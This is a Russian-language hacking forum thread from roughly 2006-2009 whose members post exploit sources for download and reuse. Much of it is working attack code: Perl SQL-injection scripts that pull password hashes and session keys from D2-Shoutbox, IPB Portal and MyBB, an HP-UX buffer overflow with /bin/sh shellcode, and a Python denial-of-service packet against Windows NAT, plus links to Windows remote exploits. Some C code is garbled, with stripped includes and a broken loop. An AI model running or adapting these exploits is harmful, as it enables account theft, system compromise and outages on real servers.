Хак! Ломать не строить - это уметь надо

Exploits

,

Постим эксплойты

Дата публикации:

de1ay, 8.03.2006 - 22:43

Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,

Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Сплойт:

» Exploit «

PRYANIK, 8.03.2006 - 23:52

D2-Shoutbox 4.2 (IPB Mod) SQL injection
#!/usr/bin/perl
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
#######################################################################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By SkOd, Sed Security Team ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}


Invision Power Board Dragoran's Portal SQL injection

#!/usr/bin/perl
############################################
#"Portal 1.3 by Dragoran"
#########################################################

use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
# IPB Portal 1.3 SQL injection Get Hash Exploit #
# Tested on Invision Power Board 1.3.0 #
# created By SkOd. SED Security Team #
############################################################
ipbpro.pl [HOST] [PATH] [Target id]
ipbpro.pl www.host.com /forum/ 2
############################################################

print "[+]Connecting...\n";
};
exit;
}
$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;
$dir = $ARGV[1];
$id = $ARGV[2];

$inj = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$inj2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$inje=$inj;
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
for ($i=1; $i<3; $i++)
{
if($i==2){
$inje=$inj2;
}
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $inje HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
$answer =~ s/width="(.*%)"//eg;
$answer =~ m/width="(.*?)"/ && print $1;
}
}

de1ay, 8.03.2006 - 23:53

Invision Power Board < 2.1.4 Password change SQL-Injection Exploit

Сплойт тут:

Ra1N, 9.03.2006 - 7:32

Мужики, я думаю будет лучше присоединять сплоиты в атач! wink.gif

de1ay, 9.03.2006 - 8:33

QUOTE
Мужики, я думаю будет лучше присоединять сплоиты в атач!

Думаю тоже wink.gif


phpRPC <= 0.7 commands execute exploit

Затронутые продукты:
MYPHPNUKE:myPHPNuke 1.8
SQUIRRELMAIL:squirrelmail 1.4
PUNBB:PunBB 1.2
PWSPHP:PwsPHP 1.2
MYBB:MyBB 1.0
EKINBOARD:EKINboard 1.0
FSCRIPTS:Fantastic News 2.1
WORDPRESS:Wordpress 2.0
TECASCRIPTS:Quirex 2.0
PERLBLOG:PerlBlog 1.08
PERLBLOG:PerlBlog 1.09
ARCHANGELMGT:Archangel Weblog 0.90
PHPRPC:phpRPC 0.7
TL4S:D3Jeeb Pro 3
CGICALENDAR:CGI Calendar 2.7
REYERO:DirectContact 3.0
LANSUITE:LanParty Intranet System 2.1
IGENUS:iGENUS Webmail 2.02
4HOMEPAGES:4images 1.7
ISSUEDEALER:Issue Dealer 0.9
JFACETS:JFacets 0.1
PARODIA:Parodia 6.2
NATHANLANDRY:n8cms 1.1
NATHANLANDRY:n8cms 1.2
FARSINEWS:FarsiNews 2.5
EJ3:EJ3 TOPo 2.2
SENDCARD:sendcard 3.3
STOREBOT:StoreBot 2002
STOREBOT:StoreBot 2005

Сплойт:

de1ay, 9.03.2006 - 9:02

Уязвимость в ProFTPD (exploit code)

ProFTPD - FTP демон для UNIX и UNIX-подобных операционных систем. Хотя этот FTP демон позиционируется как безопасный FTP сервер, уязвимость в защите демона дает возможность DoS атаки с помощью большого количества команд "неправильного" размера. Эксплоит код демонстрирует данную уязвимость ProFTPD.

Системы уязвимы:
ProFTPD version 1.2.0rc1
ProFTPD version 1.2.0rc2

Сплойт:

/* Copyright © 2001 Zorgon
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* HP-UX /bin/cu exploit.
* Tested on HP-UX 11.00
* [email protected] (http://www.nightbird.free.fr)
*
*/
#include
#include
#include
#include
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
u_char hppa_shellcode[] = /* K2 shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int
main(int argc , char **argv){
char buffer[LEN+8];
int i;
long retaddr = RET;
int offset = OFFSET;

if(argc>1) offset = atoi(argv[1]);
for (i=0;i *(long *)&buffer[i] = retaddr + offset;
for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++)
*(buffer+i) = HPPA_NOP;
memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
fprintf(stderr, "Copyright © 2001 Zorgon\n");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));
execl("/bin/cu","cu","-l",buffer,0);
}

de1ay, 9.03.2006 - 22:23

Norton AntiVirus Crash by NAV.kill File

Отказ антивируса при сканировании определенных PE файлов.

Сплойт:
» Нажмите, для открытия спойлера «

de1ay, 10.03.2006 - 8:38

MyBB Forum SQL Injection Exploit

Затронутые продукты:
PHPNUKE:phpNuke 7.8
MANTIS:Mantis 1.0
WORDPRESS:Wordpress 2.0
DELTASCRIPTS:PHP Classifieds 6.20
DOTPROJECT:dotproject 2.0
MYBB:MyBB 1.03

Сплойт:

#!/bin/env perl
#//------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#//
http://WwW.SoQoR.NeT #
#//------#

use LWP::Simple;
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n#
Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0
http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,username,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,password,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}

# WwW.SoQoR.NeT

ZaHack, 11.03.2006 - 22:48

Исходник известнейшего сплоита KAHT2!!. Для получения админских прав на win NT-family cистемах:
» Нажмите, для открытия спойлера «

de1ay, 15.03.2006 - 18:47

QUOTE
сказали аха и все забили!

Нет, не забили smile.gif

Cerberus FTP Server 2.32 Denial of Service Exploit.

Exploit:
аттач в .тхт wink.gif


yah, 17.03.2006 - 8:44

RPC Exploit GUI v2


de1ay, 19.03.2006 - 19:54

Отказ в обслуживании в Microsoft Windows XP,2003

Сплойт:
аттач wink.gif


snike, 31.08.2006 - 22:12

Появился эксплойт для DOS-атаки на форум IPB 2.1.х (до 2.1.7). Написан на Перле. Работает на всех версиях MySQL, для успешной работы требует magic_quotes_gpc = 0. Эксплуатирует уязвимость с CLIENT_IP (от 8.06.2006).
Использование очень простое и стандартное:
[путь к перлу] [путь к эксплойту] www.site.com /ipb/


» Нажмите, для открытия спойлера «

de1ay, 6.09.2006 - 7:52

Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
Описание:
сплойт вешает тачку без установленного апдейта smile.gif

» exploit code here «

говорим спасибо кодеру cocoruder(frankruder_at_hotmail.com)

de1ay, 6.09.2006 - 15:36

И ещё один сплойт бьющий на отказ Microsoft Windows 2000 SP0-SP4, Microsoft Windows XP SP0-SP1, Microsoft Windows NT 4.0 smile.gif

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)

» sources here «

Скомпиленный здесь:

Jon-dog, 7.09.2006 - 9:10

Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit

Posted by iLLuZionist user posted image

Respect!

Compeled Version:

Jon-dog, 11.09.2006 - 6:28

IGMP v3 DoS Exploit


Эфект тот же что и от EvilIGMP, только консольный вариант + исходник rolleyes.gif


_http://www.stargate-net.ru/1/IGMP.C

З.Ы. ригистр в ссылке обязателен



Добавлено:

Ну и чуть не забыл tongue.gif Откомпиленая версия:

Jon-dog, 11.09.2006 - 6:49

MS04-007-dos


Posted by Raider_Singer user posted image

На удаленной системе должен быть открытым 445 порт smile.gif

XP-SP0, SP-1, 2k, 2003

de1ay, 29.10.2006 - 22:36

Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
Очередной сплойт для проведения ДоС атаки... КПД на 0, зато нервы успокаивает smile.gif

#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF

de1ay, 12.11.2006 - 16:00

QUOTE
Jon-dog плз перезалей

Аттач smile.gif
Пароль на архив:
SoftoRooM.NeT


Love.sys, 15.11.2006 - 2:21

Exploit Get SYSTEM SHELL PORT 8080
WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303

kolovrat, 28.03.2007 - 14:47

В Сети опубликован код эксплойта, использующего уязвимость в Microsoft IE. Код опубликован человеком с ником Milw0rm на своей одноименной веб-странице.

Уязвимость, которую использует эксплойт, может использоваться для несанкционированного запуска программного кода на компьютере на целевом компьютере, на котором не установлен соответствующий патч от Microsoft.

Уязвимость была обнаружена довольно давно security-экспертом HD Moore, и еще в июле прошлого года им же был опубликован код, вызывающий «крах» браузера. Microsoft выпустила соответствующее обновление в феврале 2007 года, но, по мнению аналитиков WebSense, уязвимость все еще актуальна и хакеры еще раз обратят на нее пристальное внимание в связи с выходом эксплойта.

Эксперты eEye отметили, что код Milw0rm работает для IE 6, но не функционирует под IE 7, и сообщили, что обновленная версия эксплойта, работающая и для новейшего браузера, будет опубликована позднее.

Оригинальный код эксплойта использует ошибку в функции NextRecordset() библиотеки msado15.dll и, в случае успеха, запускает calc.exe.



Teshka, 13.11.2007 - 7:28

Цель: Microsoft Internet Explorer
Воздействие: Выполнение произвольного кода
Присоединённый файл  exploit.rar ( 4.36кб ) Кол-во скачиваний: 99

de1ay, 18.06.2008 - 15:12

MyMarket 1.72

Цитата | Quote
#http://www.site.de/my...ping/?id=bluah
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Union selecting seems not possible...
#Exploit needs a valid category id.
#The Password is in md5 so exploiting will take an awful lot of time.
#You will have to change the content on some sites if there are no categorys.
#So I couldnt make it to write a stable expl for all sites using this.
#
#SQL Injection:
#http://[target]/[path]/?id=[SQL]

» сплойт «





Mambo Component galleries 1.0 (aid) Remote SQL Injection Vulnerability

» Нажмите, для открытия спойлера | Press to open the spoiler «

de1ay, 26.09.2008 - 9:10

Invision Power Board <= 2.3.5 Remote SQL Injection Exploit

» Нажмите, для открытия спойлера | Press to open the spoiler «

de1ay, 19.11.2008 - 23:27

MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
Пока не тестил, но, как я понял, открывает телнет соединение с атакуемым компьютером.
» expl «

Jon-dog, 30.09.2009 - 6:52

(0day) Windows Vista/7 SMB2.0 Remote B.S.O.D PoC
Появился zero-day сплоит для Vista/Windows 7, позволяющий через SMB протокол отправить ось в синий экран (445 порт)


» Нажмите, для открытия спойлера | Press to open the spoiler «



версия для печати -> Полная версия

SoftoRooM © 2004-2024